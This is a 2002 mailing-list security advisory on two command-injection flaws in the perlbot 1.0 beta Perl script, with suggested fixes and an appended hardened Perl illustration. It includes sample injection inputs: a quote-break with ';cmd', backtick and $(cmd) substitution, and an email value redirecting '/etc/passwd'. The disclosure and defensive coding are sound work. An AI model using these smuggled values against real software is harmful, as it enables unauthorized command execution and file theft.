81655 2002-10-19 01:04 /111 lines/ guejez <guejez@scan-associates.net>
Imported: 2002-10-19 01:04 by Brevbäraren
External recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <2017>
Subject: SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution
------------------------------------------------------------
perlbot 1.0 beta - Remote Command Execution
Discovered By guejez of scan-associates.net
About perlbot:
------------------
[quote from perlbot website]
""
[/quote from perlbot website]
perlbot is available at http://stigmata.gothcafe.com/~madhater
Vulnerable (tested) Versions:
--------------------
Perlbot version 1.0 beta on SuSE 7.3
Vendor Contact:
----------------
07-22-02 - Emailed myneid ^^at^^ gothcafe.com. Alerted him of this vulnerability.
07-22-02 - Received email confirming vulnerabilities and stating fixes could be
in new version.
Vulnerabilities:
----------------
-- Command Execution
1. Due to no input filtering and a call to the shell, the script can be used to
execute any command the script's user has permission to run.
A more detailed explanation:
The script does not limit the characters sent to the shell from user input.
The problem is in this line:
foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)
This allows an attacker to "break out" of the quotes and issue any command
they wish with input such as anything";cmd. Other abuses include issuing
commands with `cmd` and $(cmd), or \xxx where xxx is the octal value of any
character. Some form of user input filtering must be used.
2. Due to no input filtering and a bad open() call when the script attempts
to send email, it is possible to execute commands.
A more detailed explanation:
The script attempts to send an email to the user. It takes the user's email
address and passes it to the shell as an argument to the mail program:
open (MAIL,"| $sendmail $recipient") || die $!;
This means something like hacker@scan-associates.net < /etc/passwd could be
used as an email address to get any file from the system the script has
permission to read. Command execution is also possible with
hacker@scan-associates.net ; cmd.
To prevent this, simply take the $recipient value out of the shell call.
Proof Of Concept:
-----------------
No proof of concept will be given for these issues.
Fix:
----
According to the author, a fix could be in a new version of the script. The
script's homepage was down at the time of this advisory, so here is the
suggested fix. Replace the following line:
my $word=$';
With:
my $word=$';
$word =~ s/[^\w]//g;
And replace the following line:
open (MAIL,"| $sendmail $recipient") || die $!;
With:
open (MAIL,"| $sendmail -t") || die $!;
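The script below is an added illustration written for this note; it is not
perlbot's code and not the author's patch. It places the two injection
patterns the advisory describes (the backtick pipeline and the two-argument
pipe open()) beside versions that take a different route from the suggested
fix: instead of filtering characters, they never hand user input to a shell
at all, using IPC::Open2 for ispell and the list form of open() for sendmail.
The paths /usr/local/bin/ispell and /usr/sbin/sendmail, the sample recipient
strings and the use of ispell's "^" line prefix are assumptions.

```perl
#!/usr/bin/perl
# Added illustration, not perlbot's code.  Shows the two injection patterns
# from the advisory next to versions that never hand user input to a shell.
use strict;
use warnings;
use IPC::Open2;

# Paths are assumptions (copied from the advisory's snippets, not verified).
my $ISPELL   = '/usr/local/bin/ispell';
my $SENDMAIL = '/usr/sbin/sendmail';

# Vulnerable pattern 1 (as described in the advisory): the whole command
# string is parsed by /bin/sh, so a word containing a closing quote followed
# by ; or a `...` / $(...) group runs extra commands.
sub spellcheck_via_shell {
    my ($word) = @_;
    return `/bin/echo "$word" | $ISPELL -a`;
}

# Hardened: exec ispell directly (argument list, no shell) and write the
# word to its stdin.  Shell metacharacters are now plain bytes in a pipe.
# The leading '^' asks ispell -a to treat the line as text even if it begins
# with one of ispell's own command characters (assumption about ispell -a).
sub spellcheck_safe {
    my ($word) = @_;
    return () if !defined $word || $word eq '';
    $word =~ s/[\r\n]//g;                 # ispell reads one line per request
    my $pid = open2(my $out, my $in, $ISPELL, '-a');
    print {$in} "^$word\n";
    close $in;
    my @report = <$out>;
    close $out;
    waitpid $pid, 0;
    return @report;
}

# Vulnerable pattern 2: a two-argument open() whose command string contains
# shell metacharacters is run through /bin/sh, so the redirection or ';' in a
# crafted "recipient" is interpreted by the shell, not by sendmail.
sub mail_via_shell {
    my ($recipient, $body) = @_;
    open(MAIL, "| $SENDMAIL $recipient") || die $!;
    print MAIL $body;
    close MAIL;
}

# Conservative recipient check: a small character set that contains no shell
# or option syntax, and the address may not begin with '-'.
sub valid_recipient {
    my ($addr) = @_;
    return defined $addr
        && length $addr <= 254
        && $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]*\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/;
}

# Hardened: reject anything that is not plainly an address, then use the
# list form of open(), which execs sendmail with the address as one argv
# element.  No shell is involved, so '<' and ';' cannot be interpreted; the
# check stays as defence in depth and keeps the address from ever being read
# as a sendmail option.
sub mail_safe {
    my ($recipient, $body) = @_;
    die "refusing suspicious recipient\n" unless valid_recipient($recipient);
    open(my $mail, '|-', $SENDMAIL, '-oi', $recipient) or die "sendmail: $!";
    print {$mail} "To: $recipient\nSubject: perlbot result\n\n$body";
    close $mail or warn "sendmail exited with status $?\n";
}

# Constructed sample inputs: a normal address and the shapes the advisory
# warns about, run through the validator only (nothing is executed here).
if (!caller) {
    for my $r ('someone@example.com',
               'someone@example.com < /etc/passwd',
               'someone@example.com ; cmd',
               '-bp') {
        printf "%-40s %s\n", $r, valid_recipient($r) ? 'accepted' : 'rejected';
    }
}
```

Two caveats on the advisory's own suggested fix, for anyone applying it as
written: with sendmail -t the script must itself print a To: header (and
should print only one) because sendmail now takes the recipient from the
message rather than from the command line, and s/[^\w]//g also removes
characters such as apostrophes that ispell treats as part of a word, so the
filter silently changes what gets spell-checked. Keeping input off the shell
entirely, as above, avoids both problems.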
Thanks:
-------
irc.efnet.org #vuln - various people helping with perl security issues.
pokleyzz, sk , and all of scan-associates.net
--------------------------------------------------------------------------
http://www.scan-associates.net/
(81655) /guejez <guejez@scan-associates.net>/(Reflowed)